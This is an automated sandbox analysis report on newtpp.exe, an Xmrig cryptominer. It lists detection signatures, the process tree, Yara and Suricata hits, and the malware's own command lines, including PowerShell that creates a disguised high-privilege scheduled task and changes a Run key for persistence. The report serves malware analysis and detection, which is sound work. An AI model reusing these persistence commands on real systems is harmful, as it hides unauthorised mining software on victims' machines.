Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
newtpp.exe

Overview

General Information

Sample name:newtpp.exe
Analysis ID:1565489
MD5:0c883b1d66afce606d9830f48d69d74b
SHA1:fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256:d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
Tags:exeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Detected Stratum mining protocol
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious powershell command line found
Uses Register-ScheduledTask to add task schedules
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • newtpp.exe (PID: 4108 cmdline: "C:\Users\user\Desktop\newtpp.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)
    • sysnldcvmr.exe (PID: 1516 cmdline: C:\Windows\sysnldcvmr.exe MD5: 0C883B1D66AFCE606D9830F48D69D74B)
      • 1224321169.exe (PID: 7116 cmdline: C:\Users\user\AppData\Local\Temp\1224321169.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
        • cmd.exe (PID: 5840 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7176 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
        • cmd.exe (PID: 4936 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7192 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • 2736615137.exe (PID: 7332 cmdline: C:\Users\user\AppData\Local\Temp\2736615137.exe MD5: 96509AB828867D81C1693B614B22F41D)
        • 1088610392.exe (PID: 7596 cmdline: C:\Users\user\AppData\Local\Temp\1088610392.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)
      • 204078699.exe (PID: 7532 cmdline: C:\Users\user\AppData\Local\Temp\204078699.exe MD5: 77C5EB90118287F666886FC34210C176)
      • 191563587.exe (PID: 7616 cmdline: C:\Users\user\AppData\Local\Temp\191563587.exe MD5: B92AD7E3C510355DD54DB74CDF4D522E)
  • sysnldcvmr.exe (PID: 3608 cmdline: "C:\Windows\sysnldcvmr.exe" MD5: 0C883B1D66AFCE606D9830F48D69D74B)
  • powershell.exe (PID: 7640 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 7860 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
    • conhost.exe (PID: 8116 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 3608 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 7884 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8128 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 3412 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
  • powershell.exe (PID: 7408 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x4cb268:$a1: mining.set_target
      • 0x4c6a48:$a2: XMRIG_HOSTNAME
      • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
      • 0x4c6a20:$a4: XMRIG_VERSION
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
      • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
      C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
      • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
      • 0x4d1fc8:$s3: \\.\WinRing0_
      • 0x4ca4c8:$s4: pool_wallet
      • 0x4c62d0:$s5: cryptonight
      • 0x4c62e0:$s5: cryptonight
      • 0x4c62f0:$s5: cryptonight
      • 0x4c6300:$s5: cryptonight
      • 0x4c6318:$s5: cryptonight
      • 0x4c6328:$s5: cryptonight
      • 0x4c6338:$s5: cryptonight
      • 0x4c6350:$s5: cryptonight
      • 0x4c6360:$s5: cryptonight
      • 0x4c6378:$s5: cryptonight
      • 0x4c6390:$s5: cryptonight
      • 0x4c63a0:$s5: cryptonight
      • 0x4c63b0:$s5: cryptonight
      • 0x4c63c0:$s5: cryptonight
      • 0x4c63d8:$s5: cryptonight
      • 0x4c63f0:$s5: cryptonight
      • 0x4c6400:$s5: cryptonight
      • 0x4c6410:$s5: cryptonight

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000001C.00000002.4115958696.000002434C9E8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000001C.00000002.4115958696.000002434CA42000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x4f0588:$a1: mining.set_target
            • 0x4ebd68:$a2: XMRIG_HOSTNAME
            • 0x4ed860:$a3: Usage: xmrig [OPTIONS]
            • 0x4ebd40:$a4: XMRIG_VERSION
            0000001F.00000002.3318375595.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x4cb268:$a1: mining.set_target
                • 0x4c6a48:$a2: XMRIG_HOSTNAME
                • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
                • 0x4c6a20:$a4: XMRIG_VERSION
                21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu
                • 0x4d1fc8:$s3: \\.\WinRing0_
                • 0x4ca4c8:$s4: pool_wallet
                • 0x4c62d0:$s5: cryptonight
                • 0x4c62e0:$s5: cryptonight
                • 0x4c62f0:$s5: cryptonight
                • 0x4c6300:$s5: cryptonight
                • 0x4c6318:$s5: cryptonight
                • 0x4c6328:$s5: cryptonight
                • 0x4c6338:$s5: cryptonight
                • 0x4c6350:$s5: cryptonight
                • 0x4c6360:$s5: cryptonight
                • 0x4c6378:$s5: cryptonight
                • 0x4c6390:$s5: cryptonight
                • 0x4c63a0:$s5: cryptonight
                • 0x4c63b0:$s5: cryptonight
                • 0x4c63c0:$s5: cryptonight
                • 0x4c63d8:$s5: cryptonight
                • 0x4c63f0:$s5: cryptonight
                • 0x4c6400:$s5: cryptonight
                • 0x4c6410:$s5: cryptonight
                31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 27 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7640, ProcessName: powershell.exe
                  Sigma detected: Invoke-Obfuscation VAR+ Launcher
                  Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7640, ProcessName: powershell.exe
                  Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysnldcvmr.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\newtpp.exe, ProcessId: 4108, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 7640, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T01:55:05.409561+010020440771A Network Trojan was detected192.168.2.456186182.188.65.5840500UDP
                  2024-11-30T01:55:10.423722+010020440771A Network Trojan was detected192.168.2.45618638.224.37.2440500UDP
                  2024-11-30T01:55:15.431185+010020440771A Network Trojan was detected192.168.2.45618677.44.192.4640500UDP
                  2024-11-30T01:55:20.439271+010020440771A Network Trojan was detected192.168.2.4561862.190.67.18440500UDP
                  2024-11-30T01:55:25.455137+010020440771A Network Trojan was detected192.168.2.45618689.218.218.20640500UDP
                  2024-11-30T01:55:45.565435+010020440771A Network Trojan was detected192.168.2.456186189.150.7.2540500UDP
                  2024-11-30T01:55:50.566232+010020440771A Network Trojan was detected192.168.2.456186134.35.126.11240500UDP
                  2024-11-30T01:55:55.604365+010020440771A Network Trojan was detected192.168.2.4561862.176.90.1940500UDP
                  2024-11-30T01:56:00.680926+010020440771A Network Trojan was detected192.168.2.456186188.160.12.4940500UDP
                  2024-11-30T01:56:05.675239+010020440771A Network Trojan was detected192.168.2.456186134.35.107.9540500UDP
                  2024-11-30T01:56:15.689904+010020440771A Network Trojan was detected192.168.2.4561862.135.246.1840500UDP
                  2024-11-30T01:56:20.718766+010020440771A Network Trojan was detected192.168.2.4561862.177.228.23740500UDP
                  2024-11-30T01:56:25.733511+010020440771A Network Trojan was detected192.168.2.45618677.81.130.6040500UDP
                  2024-11-30T01:56:30.779181+010020440771A Network Trojan was detected192.168.2.45618691.185.130.16640500UDP
                  2024-11-30T01:56:35.814664+010020440771A Network Trojan was detected192.168.2.456186182.188.65.5840500UDP
                  2024-11-30T01:56:45.912158+010020440771A Network Trojan was detected192.168.2.456186195.158.21.7440500UDP
                  2024-11-30T01:56:51.540424+010020440771A Network Trojan was detected192.168.2.456186134.35.205.2940500UDP
                  2024-11-30T01:56:56.642308+010020440771A Network Trojan was detected192.168.2.456186198.163.193.9640500UDP
                  2024-11-30T01:57:01.679030+010020440771A Network Trojan was detected192.168.2.456186134.35.104.9540500UDP
                  2024-11-30T01:57:06.858689+010020440771A Network Trojan was detected192.168.2.45618692.46.228.24640500UDP
                  2024-11-30T01:57:16.892516+010020440771A Network Trojan was detected192.168.2.456186217.30.160.21940500UDP
                  2024-11-30T01:57:22.261797+010020440771A Network Trojan was detected192.168.2.456186178.71.163.14140500UDP
                  2024-11-30T01:57:27.264625+010020440771A Network Trojan was detected192.168.2.45618641.138.38.16440500UDP
                  2024-11-30T01:57:32.282425+010020440771A Network Trojan was detected192.168.2.456186195.158.18.19440500UDP
                  2024-11-30T01:57:37.322689+010020440771A Network Trojan was detected192.168.2.45618689.249.62.8740500UDP
                  2024-11-30T01:57:47.362011+010020440771A Network Trojan was detected192.168.2.45618637.99.52.15040500UDP
                  2024-11-30T01:57:52.755253+010020440771A Network Trojan was detected192.168.2.45618680.191.218.20940500UDP
                  2024-11-30T01:57:57.753210+010020440771A Network Trojan was detected192.168.2.456186176.113.143.7740500UDP
                  2024-11-30T01:58:02.768116+010020440771A Network Trojan was detected192.168.2.4561862.190.67.18440500UDP
                  2024-11-30T01:58:07.784043+010020440771A Network Trojan was detected192.168.2.4561865.219.134.10240500UDP
                  2024-11-30T01:58:12.799198+010020440771A Network Trojan was detected192.168.2.456186213.230.108.9240500UDP
                  2024-11-30T01:58:17.846192+010020440771A Network Trojan was detected192.168.2.45618682.200.169.18640500UDP
                  2024-11-30T01:58:22.848089+010020440771A Network Trojan was detected192.168.2.456186188.212.145.21440500UDP
                  2024-11-30T01:58:27.862672+010020440771A Network Trojan was detected192.168.2.45618691.185.146.15040500UDP
                  2024-11-30T01:58:33.434558+010020440771A Network Trojan was detected192.168.2.456186187.223.139.7340500UDP
                  2024-11-30T01:58:38.440011+010020440771A Network Trojan was detected192.168.2.45618689.249.62.8740500UDP
                  2024-11-30T01:58:48.472179+010020440771A Network Trojan was detected192.168.2.45618689.44.147.15740500UDP
                  2024-11-30T01:59:24.018155+010020440771A Network Trojan was detected192.168.2.45618690.156.163.10140500UDP
                  2024-11-30T01:59:34.039261+010020440771A Network Trojan was detected192.168.2.456186198.163.193.22940500UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T01:54:49.218533+010028269302Crypto Currency Mining Activity Detected192.168.2.449838185.215.113.665152TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T01:55:03.970185+010028032742Potentially Bad Traffic192.168.2.449730185.215.113.6680TCP
                  2024-11-30T01:55:06.450023+010028032742Potentially Bad Traffic192.168.2.449732185.215.113.6680TCP
